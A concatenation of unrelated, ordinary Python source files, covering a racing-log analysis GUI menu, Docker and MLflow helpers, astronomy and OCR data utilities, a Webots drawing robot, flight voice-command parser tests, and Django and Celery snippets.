command=self.main_app.menu_callback_true_bearing_off) menu.add_separator() menu.add_command(label="Camera Vision - On", command=self.main_app.menu_callback_camera_vision_on) menu.add_command(label="Camera Vision - Off", command=self.main_app.menu_callback_camera_vision_off) self.menubar.add_cascade(label="View", menu=menu) def add_analyze_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Episode Route", command=self.main_app.menu_callback_analyze_route) menu.add_command(label="Episode Speed", command=self.main_app.menu_callback_analyze_episode_speed) menu.add_command(label="Episode Reward", command=self.main_app.menu_callback_analyze_episode_reward) menu.add_command(label="Episode Slide", command=self.main_app.menu_callback_analyze_episode_slide) if not self._is_continuous_action_space: menu.add_command(label="Episode Action Distribution", command=self.main_app.menu_callback_analyze_episode_action_distribution) menu.add_separator() menu.add_command(label="Heatmap", command=self.main_app.menu_callback_analyze_track_heatmap) menu.add_command(label="Heatmap + Episode Route", command=self.main_app.menu_callback_analyze_route_over_heatmap) menu.add_command(label="Heatmap + Exit Points", command=self.main_app.menu_callback_analyze_exit_points_over_heatmap) menu.add_separator() menu.add_command(label="Exit Points", command=self.main_app.menu_callback_analyze_exit_points) menu.add_command(label="Simulate Race", command=self.main_app.menu_callback_analyze_race) menu.add_separator() # TODO - hyperparams ... 
# menu.add_command(label="View Hyperparameters", command=self.main_app.menu_callback_analyze_hyperparameters) menu.add_command(label="Compare Discount Factors", command=self.main_app.menu_callback_analyze_discount_factors) menu.add_separator() menu.add_command(label="Training Progress", command=self.main_app.menu_callback_analyze_training_progress) menu.add_command(label="Quarterly Results", command=self.main_app.menu_callback_analyze_quarterly_results) menu.add_command(label="Complete Lap Percentage", command=self.main_app.menu_callback_analyze_complete_lap_percentage) menu.add_separator() menu.add_command(label="Lap Time Correlations", command=self.main_app.menu_callback_analyze_lap_time_correlations) menu.add_command(label="Lap Time Distribution", command=self.main_app.menu_callback_analyze_lap_time_distribution) menu.add_separator() menu.add_command(label="Sector Time Correlations", command=self.main_app.menu_callback_analyze_sector_time_correlations) menu.add_separator() menu.add_command(label="Reward Distribution", command=self.main_app.menu_callback_analyze_reward_distribution) menu.add_command(label="Common Rewards", command=self.main_app.menu_callback_analyze_common_rewards) menu.add_command(label="Rewards per Waypoint", command=self.main_app.menu_callback_analyze_rewards_per_waypoint) self.menubar.add_cascade(label="Analyze", menu=menu) def add_fitting_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Track Curve Fitting", command=self.main_app.menu_callback_analyze_curve_fitting) menu.add_command(label="Track Straight Fitting", command=self.main_app.menu_callback_analyze_straight_fitting) self.menubar.add_cascade(label="Fitting", menu=menu) def add_episode_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="All", command=self.main_app.menu_callback_episodes_all) menu.add_command(label="All From Start", command=self.main_app.menu_callback_episodes_all_from_start) menu.add_separator() menu.add_command(label="Complete Laps", command=self.main_app.menu_callback_episodes_complete_laps) menu.add_command(label="Complete Laps from Start", command=self.main_app.menu_callback_episodes_complete_laps_from_start) menu.add_command(label="Fast Laps", command=self.main_app.menu_callback_episodes_fast_laps) menu.add_separator() menu.add_command(label="10% complete", command=self.main_app.menu_callback_episodes_min_percent_10) menu.add_command(label="25% complete", command=self.main_app.menu_callback_episodes_min_percent_25) menu.add_command(label="33% complete", command=self.main_app.menu_callback_episodes_min_percent_33) menu.add_command(label="50% complete", command=self.main_app.menu_callback_episodes_min_percent_50) menu.add_separator() menu.add_command(label="Q1", command=self.main_app.menu_callback_episodes_q1) menu.add_command(label="Q2", command=self.main_app.menu_callback_episodes_q2) menu.add_command(label="Q3", command=self.main_app.menu_callback_episodes_q3) menu.add_command(label="Q4", command=self.main_app.menu_callback_episodes_q4) menu.add_separator() for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self._choose_episode_filter_sector(sector)) menu.add_separator() menu.add_command(label="More ...", command=self.open_episode_filter_dialog) self.menubar.add_cascade(label="Episodes", menu=menu) def add_action_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="All", command=self.main_app.menu_callback_actions_all) menu.add_command(label="High 
Speed", command=self.main_app.menu_callback_actions_high_speed) menu.add_command(label="Medium Speed", command=self.main_app.menu_callback_actions_medium_speed) menu.add_command(label="Low Speed", command=self.main_app.menu_callback_actions_low_speed) menu.add_command(label="Straight", command=self.main_app.menu_callback_actions_straight) menu.add_separator() menu.add_command(label="More ...", command=self.open_action_space_filter_dialog) self.menubar.add_cascade(label="Actions", menu=menu) def add_secret_sauce_menu(self): if ss.SHOW_SS: ss.make_menu(self.menubar, self.main_app) def add_admin_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Re-calculate Log Meta", command=self.refresh_all_log_meta) menu.add_command(label="View Log File Info", command=self.main_app.menu_callback_view_log_file_info) self.menubar.add_cascade(label="Admin", menu=menu) def new_files(self): NewFilesDialog(self.main_app, self.main_app.please_wait) self.refresh() def open_file(self): OpenFileDialog(self.main_app, "Open File") def file_options(self): FileOptionsDialog(self.main_app) def choose_track(self, track): self.main_app.menu_callback_switch_track(track) def choose_sector(self, sector: str): self.main_app.menu_callback_sector_filter(sector) def zoom_sector(self, sector: str): self.main_app.menu_callback_sector_zoom(sector) def _choose_episode_filter_sector(self, sector: str): self.main_app.menu_callback_episodes_sector(sector) def open_episode_filter_dialog(self): EpisodeFilterDialog(self.main_app) def open_action_space_filter_dialog(self): ActionSpaceFilterDialog(self.main_app) def refresh_all_log_meta(self): src.log.log_utils.refresh_all_log_meta(self.main_app.please_wait, self.main_app.get_log_directory()) self.main_app.please_wait.stop() messagebox.showinfo("Refresh All Log Meta", "Refresh succeeded!") self.refresh() shouc/corbfuzz import time import os import uuid import config import utils def create_image(docker_file_path: str): docker_file = open(docker_file_path + "/Dockerfile").read() build_id = uuid.uuid4() tmp_file_path = f"/tmp/{build_id}" os.system(f"cp -R {docker_file_path} {tmp_file_path}") with open(f"{tmp_file_path}/Dockerfile", "w") as fp: fp.write(docker_file) config.DOCKER_INSTANCE.images.build(path=tmp_file_path, tag=build_id) return build_id def spin_up_container(build_id: str): assert build_id in config.DOCKER_INSTANCE.images.list() container_id = config.DOCKER_INSTANCE.containers.run(build_id, detach=True).id time.sleep(10) utils.INFO("Spinning up the container....") container = config.DOCKER_INSTANCE.containers.get(container_id) utils.REDIS_OBJ.set("target", container.attrs['NetworkSettings']['IPAddress']) return container def get_target(): if config.USE_DOCKER: while not utils.REDIS_OBJ.get("target"): time.sleep(config.WAIT_TIME) return utils.REDIS_OBJ.get("target").decode("latin-1") return config.TARGET import argparse import logging import traceback import tornado.ioloop from pyfunc_ensembler_runner.server import PyFuncEnsemblerServer from pyfunc_ensembler_runner import PyFuncEnsemblerRunner parser = argparse.ArgumentParser() parser.add_argument('--mlflow_ensembler_dir', required=True, help='A dir pointing to the saved Mlflow Pyfunc ensembler') parser.add_argument('--dry_run', default=False, action='store_true', required=False, help="Dry run pyfunc ensembler by loading the specified ensembler " "in --mlflow_ensembler_dir without starting webserver") parser.add_argument('-l', '--log-level', dest='log_level', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 
'CRITICAL'], help='Set the logging level', default=logging.DEBUG) args, _ = parser.parse_known_args() if __name__ == "__main__": logging.basicConfig(level=args.log_level) logging.info( 'Called with arguments:\n%s\n', '\n'.join([f'{k}: {v}' for k, v in vars(args).items()]) ) ensembler = PyFuncEnsemblerRunner(args.mlflow_ensembler_dir) try: ensembler.load() except Exception as e: logging.error("Unable to initialise PyFuncEnsemblerRunner from the MLflow directory provided.") logging.error(traceback.format_exc()) exit(1) if args.dry_run: logging.info("Dry run success") exit(0) app = PyFuncEnsemblerServer(ensembler).create_application() logging.info("Ensembler ready to serve requests!") app.listen(8083) tornado.ioloop.IOLoop.current().start() 0 """Utilities for the-wizz library. Contains file loading/closing, cosmology, and setting the verbosity of the outputs. """ from astropy.cosmology import WMAP5 from astropy.io import fits import h5py import numpy as np def file_checker_loader(input_file_name): """Utility function for checking the existence of a file and loading the file with the proper format. Currently checks for FITS files. ---------------------------------------------------------------------------- Args: sample_file_name: name of file on disk to load Returns: open file object data """ try: file_handle = open(input_file_name) file_handle.close() except IOError: print("IOError: File %s not found. the-wizz is exiting." % input_file_name) raise IOError("File not found.") if input_file_name.endswith('fit') or input_file_name.endswith('fits') or \ input_file_name.endswith('gz') or input_file_name.endswith('cat'): hdu_list = fits.open(input_file_name) data = hdu_list[1].data return data elif input_file_name.endswith('hdf5') or input_file_name.endswith('dat'): hdf5_file = h5py.File(input_file_name, 'r') return hdf5_file else: print("File type not currently supported. Try again later. " "the-wizz is exiting.") raise IOError return None def create_hdf5_file(hdf5_file_name, args): # TODO: # Decide if I want to use libver latest or not. Could be more stable # if we use the "earliest" version. Will have to speed test saving # and loading of the pairs. """Convenience function for creating an HDF5 file with attributes set in input_flags. Saves the current input flags to the group input_flags for later reference ---------------------------------------------------------------------------- Args: hdf5_file_name: string name of the HDF5 file to create args: argparse ArgumentParser.parse_args object from input_flags Returns: open HDF5 file object """ hdf5_file = h5py.File(hdf5_file_name, 'w-', libver='latest') if args is not None: flag_grp = hdf5_file.create_group('input_flags') for arg in vars(args): kwargs = {} if type(arg) is str: kwargs["dtype"] = h5py.special_dtype(vlen=str) if getattr(args, arg) is None: flag_grp.attrs.create( arg, 'None', dtype=h5py.special_dtype(vlen=str)) else: flag_grp.attrs.create(arg, getattr(args, arg), **kwargs) return hdf5_file def create_ascii_file(ascii_file_name, args): """Convenience function for creating an output ascii file. This method writes the current state of the input_flags arguments to the header of the file and returns an open Python file handle object. The method will over write any file it is given so use with caution. 
---------------------------------------------------------------------------- Args: ascii_file_name: string name of the file to write too args: argparse ArgumentParser.parse_args object from input_flags Returns: open Python file object """ ascii_file = open(ascii_file_name, 'w') ascii_file.writelines('# input_flags:\n') for arg in vars(args): ascii_file.writelines('#\t%s : %s\n' % (arg, getattr(args, arg))) return ascii_file 1-10 """ Maps tiers to roll rates for all food items at that tier and lower. """ # Local application imports from gym_snape.game.utils import RollRate from gym_snape.game.food.tier1 import * from gym_snape.game.food.tier2 import * from gym_snape.game.food.tier3 import * from gym_snape.game.food.tier4 import * from gym_snape.game.food.tier5 import * from gym_snape.game.food.tier6 import * roll_rates = { 1: [ RollRate(Apple, 0.5), RollRate(Honey, 0.5) ], 2: [ RollRate(Apple, 0.2), RollRate(Honey, 0.2), RollRate(Cupcake, 0.2), RollRate(MeatBone, 0.2), RollRate(SleepingPill, 0.2) ], 3: [ RollRate(Apple, 0.1), RollRate(Honey, 0.15), RollRate(Cupcake, 0.15), RollRate(MeatBone, 0.15), RollRate(SleepingPill, 0.15), RollRate(Garlic, 0.15), RollRate(SaladBowl, 0.15) ], 4: [ RollRate(Apple, 0), RollRate(Honey, 0.05), RollRate(Cupcake, 0.05), RollRate(MeatBone, 0.15), RollRate(SleepingPill, 0.15), RollRate(Garlic, 0.15), RollRate(SaladBowl, 0.15), RollRate(CannedFood, 0.15), RollRate(Pear, 0.15) ], 5: [ RollRate(Apple, 0), RollRate(Honey, 0), RollRate(Cupcake, 0), RollRate(MeatBone, 0.1), RollRate(SleepingPill, 0.1), RollRate(Garlic, 0.1), RollRate(SaladBowl, 0.1), RollRate(CannedFood, 0.12), RollRate(Pear, 0.12), RollRate(Chili, 0.12), RollRate(Chocolate, 0.12), RollRate(Sushi, 0.12) ], 6: [ RollRate(Apple, 0), RollRate(Honey, 0), RollRate(Cupcake, 0), RollRate(MeatBone, 0), RollRate(SleepingPill, 0), RollRate(Garlic, 0.05), RollRate(SaladBowl, 0.05), RollRate(CannedFood, 0.1), RollRate(Pear, 0.1), RollRate(Chili, 0.1), RollRate(Chocolate, 0.1), RollRate(Sushi, 0.1), RollRate(Melon, 0.1), RollRate(Mushroom, 0.1), RollRate(Pizza, 0.1), RollRate(Steak, 0.1) ] } if __name__ == '__main__': """Check that all roll rates are valid.""" # Lazy import since only need numpy for this test import numpy as np for i in sorted(roll_rates.keys()): food, rates = [], [] for rr in roll_rates[i]: food.append(rr.item) rates.append(rr.rate) try: np.random.choice(food, p=rates, size=1) except: print(f'Could not sample from tier {i}') print(f'Summed to {np.sum(rates)}') preprocessing.py # Python 3.7.6 # -*- coding: utf-8 -*- # Author: import os import random import cv2 import fnmatch import numpy as np from tqdm import tqdm char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' len_char_list = len(char_list) path = str(os.getcwd()) while True: windows = input('Are you using Windows? (y/n) ') if (windows != 'y' and windows != 'n'): windows = input('Are you using Windows? 
(y/n) ') else: break if windows == 'y': path = path + r'\mjsynth.tar\mnt\ramdisk\max\90kDICT32px' else: path = path + '/mnt/ramdisk/max/90kDICT32px' width = 32 height = 128 dim = (width, height) # convert each character of the word into a label (int) def char_to_int(word): int_list = [] for i, c in enumerate(word): int_list.append(char_list.index(c)) return np.array(int_list) def preprocessing(datafile, max_data): max_text_length = 0 len_data = 0 data_img = [] data_txt = [] # prepare storage if not os.path.exists('train'): os.mkdir('train') if not os.path.exists('val'): os.mkdir('val') if not os.path.exists('test'): os.mkdir('test') data_samples = [] with open(path+datafile, 'r', encoding='utf-8') as tr: for line in tr.readlines(): data_samples.append(line[1:].split(' ')[0]) random_selection = random.sample(data_samples, max_data) print(len(random_selection)) for filename in tqdm(random_selection): # get text seen on the image (which is the filename) text = filename.split('_')[-2] # keep track of the maximum text length if len(text) > max_text_length: max_text_length = len(text) # convert image to gray scale img = cv2.cvtColor(cv2.imread(path+filename), cv2.COLOR_BGR2GRAY) # convert image to shape (32, 128, 1) w, h = img.shape if (w != width and h != height): img = cv2.resize(img, dim, interpolation=cv2.INTER_AREA) img = np.expand_dims(img , axis=2) # normalize image img = img/255 data_img.append(img) data_txt.append(char_to_int(text)) len_data += 1 # break loops when enough data is collected if len_data == max_data: break print('Max text length: ', max_text_length) sav_str = datafile.split('_')[1].split('.')[0] # saving np.save(sav_str+'/'+sav_str+'_data.npy', np.array(data_img)) np.save(sav_str+'/'+sav_str+'_labels.npy', np.array(data_txt)) print(len(data_img)) print(len(data_txt)) if __name__ == '__main__': preprocessing('/annotation_test.txt', 20000) preprocessing('/annotation_val.txt', 20000) preprocessing('/annotation_train.txt', 160000)from controller import Robot TIME_STEP = 64 DS_L = 0 DS_R = 1 DS_WALL_STOP = 400 class ScribbleBot: def __init__(self): self.robot = Robot() # Define and enable distance sensors self.ds = [self.robot.getDistanceSensor(name) for name in ['ds_left', 'ds_right']] for sensor in self.ds: sensor.enable(TIME_STEP) # Define motors self.front_left_motor = self.robot.getMotor('wheel1') self.front_right_motor = self.robot.getMotor('wheel2') self.back_left_motor = self.robot.getMotor('wheel3') self.back_right_motor = self.robot.getMotor('wheel4') # Group motors for easy access self.motors = [ self.front_left_motor, self.front_right_motor, self.back_left_motor, self.back_right_motor ] # Enable motors for motor in self.motors: motor.setPosition(float('inf')) motor.setVelocity(0.0) # Define encoders self.enc_front_left = self.robot.getPositionSensor('front left position') self.enc_front_right = self.robot.getPositionSensor('front right position') self.enc_back_left = self.robot.getPositionSensor('back left position') self.enc_back_right = self.robot.getPositionSensor('back right position') # Enable encoders self.enc_front_left.enable(TIME_STEP) self.enc_front_right.enable(TIME_STEP) self.enc_back_left.enable(TIME_STEP) self.enc_back_right.enable(TIME_STEP) # Line generator self.pen = self.robot.getPen('pen') self.pen.write(True) # Positions of encoders self.position_front_left = 0 self.position_back_left = 0 self.position_front_right = 0 self.position_back_right = 0 # Internal velocities, one per side self.left_vel = 0 self.right_vel = 0 # List for distance sensor 
values self.ds_values = [] def write_motors(self): """Write the current velocities into motor objects""" self.front_left_motor.setVelocity(self.left_vel) self.back_left_motor.setVelocity(self.left_vel) self.front_right_motor.setVelocity(self.right_vel) self.back_right_motor.setVelocity(self.right_vel) def stop_motors(self): """Helper util to stop motors""" self.left_vel = 0 self.right_vel = 0 self.write_motors() def capture_position(self): """Capture current encoder values in position variables""" # Left positions self.position_front_left = self.enc_front_left.getValue() self.position_back_left = self.enc_back_left.getValue() # Right positions self.position_front_right = self.enc_front_right.getValue() self.position_back_right = self.enc_back_right.getValue() def check_left_moved(self, distance: float) -> bool: """ Manages a left side distance move. If either motor has achieved distance required, it is manually stopped. If both have, function returns `True` """ front_moved = abs(self.enc_front_left.getValue() - self.position_front_left) > distance back_moved = abs(self.enc_back_left.getValue() - self.position_back_left) > distance if front_moved: self.front_left_motor.setVelocity(0) if back_moved: self.back_left_motor.setVelocity(0) both = front_moved and back_moved if both: self.left_vel = 0 return both def check_right_moved(self, distance: float) -> bool: """ Manages a right side distance move. If either motor has achieved distance required, it is manually stopped. If both have, function returns `True` """ front_moved = abs(self.enc_front_right.getValue() - self.position_front_right) > distance back_moved = abs(self.enc_back_right.getValue() - self.position_back_right) > distance if front_moved: self.front_right_motor.setVelocity(0) if back_moved: self.back_right_motor.setVelocity(0) both = front_moved and back_moved if both: self.right_vel = 0 return both def make_turn(self, left_dist: float, right_dist: float): """ Makes a turn based on velocities and encoder positions. Blocking. Velocities must be set outside function call. Each wheel is moved to corresponding side distance and stopped """ self.write_motors() self.capture_position() while self.robot.step(TIME_STEP) != -1: left_moved = self.check_left_moved(left_dist) right_moved = self.check_right_moved(right_dist) if left_moved and right_moved: break def make_left_turn(self, distance: float): """ Make a left turn by a distance. Blocking. Velocities must be set outside function call. `distance` pertains to right wheel, left wheel distance is calculated from this and velocity ratio for perfect arcing turn """ ratio = self.left_vel / self.right_vel self.make_turn(ratio * distance, distance) def make_right_turn(self, distance: float): """ Make a right turn by a distance. Blocking. Velocities must be set outside function call. `distance` pertains to left wheel, right wheel distance is calculated from this and velocity ratio for perfect arcing turn """ ratio = self.right_vel / self.left_vel self.make_turn(distance, ratio * distance) def move_dist(self, distance: float): """ Move a distance forward. Blocking. 
Velocities must be set outside function call """ self.write_motors() self.capture_position() while self.robot.step(TIME_STEP) != -1: left_moved = self.check_left_moved(distance) right_moved = self.check_right_moved(distance) if left_moved and right_moved: break def load_distance_values(self): """Load current distance values from `self.ds` into `self.ds_values`""" self.ds_values = [] for ds in self.ds: self.ds_values.append(ds.getValue()) def init_sensors(self): """Initialize sensors to avoid error values like NaN""" for i in range(0, 5): if self.robot.step(TIME_STEP) == -1: break for ds in self.ds: ds.getValue() self.enc_front_left.getValue() self.enc_front_right.getValue() self.enc_back_left.getValue() self.enc_back_right.getValue() def do_the_wave(self): """Do the waaaaave""" # Entry turn to the right self.left_vel = 3 self.right_vel = 0.1 self.make_right_turn(6) # Arcing main turn to the left self.left_vel = 1 self.right_vel = 3.5 self.make_left_turn(15.8) # Exiting turn to the right self.left_vel = 3 self.right_vel = 0.5 self.make_right_turn(4.5) # Aligning turn to the right, slow and precise self.left_vel = 1 self.right_vel = 0.2 self.make_right_turn(1.94) def search_for_wall(self): """Drive forward until wall is found""" print('Finding end wall...') self.left_vel = 3 self.right_vel = 3 self.write_motors() while self.robot.step(TIME_STEP) != -1: self.load_distance_values() # print('FL: {} FR: {}'.format(self.ds_values[DS_L], self.ds_values[DS_R])) if self.ds_values[DS_L] < DS_WALL_STOP and self.ds_values[DS_R] < DS_WALL_STOP: break def setup(self): """Pre-movement initializations. Runs once""" print('Initializing...') self.init_sensors() self.left_vel = 3 self.right_vel = 3 self.write_motors() def main(self): """Main code. Usually a loop or series of loops""" print('Running...') self.move_dist(7) for i in range(4): self.do_the_wave() self.search_for_wall() def cleanup(self): """Post-movement finishing code""" self.stop_motors() print('Finished drawing.') def run(self): """Primary running method""" self.setup() self.main() self.cleanup() print('Loading robot...') scribbles = ScribbleBot() scribbles.run() import unittest from xcopilot.commands import CommandProcessor from xcopilot.config import DefaultCommands class CommandProcessorTest(unittest.TestCase): def _assertCommand(self, command, name, value): self.assertIsNotNone(command, 'Command unrecognized') self.assertEqual(command.name, name) self.assertEqual(command.value, value) def _assertCommandNotRecognized(self, command): self.assertIsNone(command, 'Command recognized when it should not') def setUp(self): self.commandProcessor = CommandProcessor() self.commandProcessor.setConfig(DefaultCommands) def test_support_SET_ALTIMETER_command(self): self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2992'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2 99 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2 9 9 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter two nine nine two'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter two 9 nine 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter three zero zero 0'), 'SET_ALTIMETER', 30.00) self._assertCommand(self.commandProcessor.parseCommand('set altimeter three zero one two'), 'SET_ALTIMETER', 30.12) 
self._assertCommand(self.commandProcessor.parseCommand('set altimeter one zero one three'), 'SET_ALTIMETER', 1013 * 0.0295301) def test_support_SET_ALTITUDE_command(self): self._assertCommand(self.commandProcessor.parseCommand('set altitude one zero three'), 'SET_ALTITUDE', 103) self._assertCommand(self.commandProcessor.parseCommand('set altitude two nine zero zero'), 'SET_ALTITUDE', 2900) self._assertCommand(self.commandProcessor.parseCommand('set altitude three five eight zero zero'), 'SET_ALTITUDE', 35800) def test_support_FLIGHT_LEVEL_command(self): self._assertCommand(self.commandProcessor.parseCommand('set flight level three five zero'), 'FLIGHT_LEVEL', 35000) self._assertCommand(self.commandProcessor.parseCommand('flight level zero five zero'), 'FLIGHT_LEVEL', 5000) def test_support_LANDING_GEAR_command(self): self._assertCommand(self.commandProcessor.parseCommand('landing gear up'), 'LANDING_GEAR', 0) self._assertCommand(self.commandProcessor.parseCommand('landing gear down'), 'LANDING_GEAR', 1) self._assertCommand(self.commandProcessor.parseCommand('gear up'), 'LANDING_GEAR', 0) self._assertCommand(self.commandProcessor.parseCommand('gear down'), 'LANDING_GEAR', 1) def test_support_FLAPS_command(self): self._assertCommand(self.commandProcessor.parseCommand('flaps up'), 'FLAPS', 0) self._assertCommand(self.commandProcessor.parseCommand('flaps down'), 'FLAPS', 1) def test_support_SET_NAV1_command(self): self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight decimal two five'), 'SET_NAV1', 10825) self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight two zero'), 'SET_NAV1', 10820) self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight decimal two'), 'SET_NAV1', 10820) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five one')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five two')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five three')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five four')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five six')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five sevem')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five eight')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five nine')) def test_support_SET_COM1_command(self): self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight decimal two five'), 'SET_COM1', 11825) self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight two seven'), 'SET_COM1', 11827) self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight decimal two'), 'SET_COM1', 11820) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set com one to one zero eight decimal five zero')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set com one to one three eight five')) def test_support_LANDING_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('landing light on'), 'LANDING_LIGHTS', 1) 
self._assertCommand(self.commandProcessor.parseCommand('landing light off'), 'LANDING_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('landing lights on'), 'LANDING_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('landing lights off'), 'LANDING_LIGHTS', 0) def test_support_TAXI_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('taxi lights off'), 'TAXI_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('taxi lights on'), 'TAXI_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('taxi light off'), 'TAXI_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('taxi light on'), 'TAXI_LIGHTS', 1) def test_support_NAV_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('navigation lights off'), 'NAV_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('navigation lights on'), 'NAV_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('navigation light off'), 'NAV_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('navigation light on'), 'NAV_LIGHTS', 1) def test_support_STROBE_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('strobe lights off'), 'STROBE_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('strobe lights on'), 'STROBE_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('strobe light off'), 'STROBE_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('strobe light on'), 'STROBE_LIGHTS', 1) def test_support_BEACON_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('beacon lights off'), 'BEACON_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('beacon lights on'), 'BEACON_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('beacon light off'), 'BEACON_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('beacon light on'), 'BEACON_LIGHTS', 1) import logging as logging_module import os # From metrickeep/core/settings.py to metrickeep/ cwd = os.path.abspath(os.path.dirname(__file__)) PROJECT_ROOT = os.path.abspath(os.path.join(cwd, os.pardir)) # logging # ------- logging = { 'format': '%(asctime)s | [%(levelname)s] %(message)s', 'level': 'INFO', } logging_module.basicConfig(**logging) logger = logging_module.getLogger(__name__) # whisper # ------- whisper_path = os.path.join(PROJECT_ROOT, "whispers") whisper_archives = "10s:24h,1m:7d,5m:3y" whisper_xfilesfactor = 0.0 whisper_aggregation = "average" drift_epsilon = 2 # seconds 1-10 # EASY MULTIPLE for _ in range(int(input())): n = int(input())-1 if n<3: print('0') continue elif n<5: print('3') continue t3 = n//3 t5 = n//5 t15 = n//15 t3l = t3*3 t5l = t5*5 t15l = t15*15 res3 = (t3*(3+t3l))//2 res5 = (t5*(5+t5l))//2 res15 = (t15*(15+t15l))//2 fres = int(res3+res5-res15) print(fres) conftest.py from pathlib import Path import pytest def _py_files(folder): return (str(p) for p in Path(folder).rglob('*.py')) collect_ignore = [ # not a test, but looks like a test "scrapy/utils/testsite.py", # contains scripts to be run by tests/test_crawler.py::CrawlerProcessSubprocess *_py_files("tests/CrawlerProcess") ] for line in open('tests/ignores.txt'): file_path = line.strip() if file_path and file_path[0] != '#': collect_ignore.append(file_path) @pytest.fixture() def chdir(tmpdir): """Change to pytest-provided temporary directory""" tmpdir.chdir() def pytest_collection_modifyitems(session, config, items): # Avoid executing tests when 
executing `--flake8` flag (pytest-flake8) try: from pytest_flake8 import Flake8Item if config.getoption('--flake8'): items[:] = [item for item in items if isinstance(item, Flake8Item)] except ImportError: pass saidulislam/siapp-python-crud-template0 from lib.flask_mailplus import send_template_message from siapp.app import create_celery_app celery = create_celery_app() @celery.task() def deliver_contact_email(email, message): """ Send a contact e-mail. :param email: E-mail address of the visitor :type user_id: str :param message: E-mail message :type user_id: str :return: None """ ctx = {'email': email, 'message': message} send_template_message(subject='[siapp] Contact', sender=email, recipients=[celery.conf.get('MAIL_USERNAME')], reply_to=email, template='contact/mail/index', ctx=ctx) return None pranaygarg/HMS-RV from django.db.models import Q from rest_framework import generics, mixins from .models import Student,Hostelite from .serializers import StudentSerializer,HosteliteSerializer class StudentAPIView(generics.RetrieveAPIView): #detailview createview formview lookup_field = 'usn' #slug, id# (r'?P\d+') serializer_class = StudentSerializer #queryset = BlogPost.objects.all() def get_queryset(self): return Student.objects.all() # def get_object(self): # id = self.kwargs.get("id") # return Student.objects.get(usn = id) class HosteliteAPIView(generics.RetrieveAPIView): #detailview createview formview lookup_field = 'usn' #slug, id# (r'?P\d+') serializer_class = HosteliteSerializer def get_queryset(self): return Hostelite.objects.all()import os import time import numpy as np import socket from scipy import sparse as spsp import dgl import backend as F import unittest from dgl.graph_index import create_graph_index import multiprocessing as mp from numpy.testing import assert_array_equal if os.name != 'nt': import fcntl import struct def get_local_usable_addr(): """Get local usable IP and port Returns ------- str IP address, e.g., '192.168.8.12:50051' """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable sock.connect(('10.255.255.255', 1)) ip_addr = sock.getsockname()[0] except ValueError: ip_addr = '127.0.0.1' finally: sock.close() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("", 0)) sock.listen(1) port = sock.getsockname()[1] sock.close() return ip_addr + ' ' + str(port) # Create an one-part Graph node_map = F.tensor([0,0,0,0,0,0], F.int64) edge_map = F.tensor([0,0,0,0,0,0,0], F.int64) global_nid = F.tensor([0,1,2,3,4,5], F.int64) global_eid = F.tensor([0,1,2,3,4,5,6], F.int64) g = dgl.DGLGraph() g.add_nodes(6) g.add_edges(0, 1) # 0 g.add_edges(0, 2) # 1 g.add_edges(0, 3) # 2 g.add_edges(2, 3) # 3 g.add_edges(1, 1) # 4 g.add_edges(0, 4) # 5 g.add_edges(2, 5) # 6 g.ndata[dgl.NID] = global_nid g.edata[dgl.EID] = global_eid gpb = 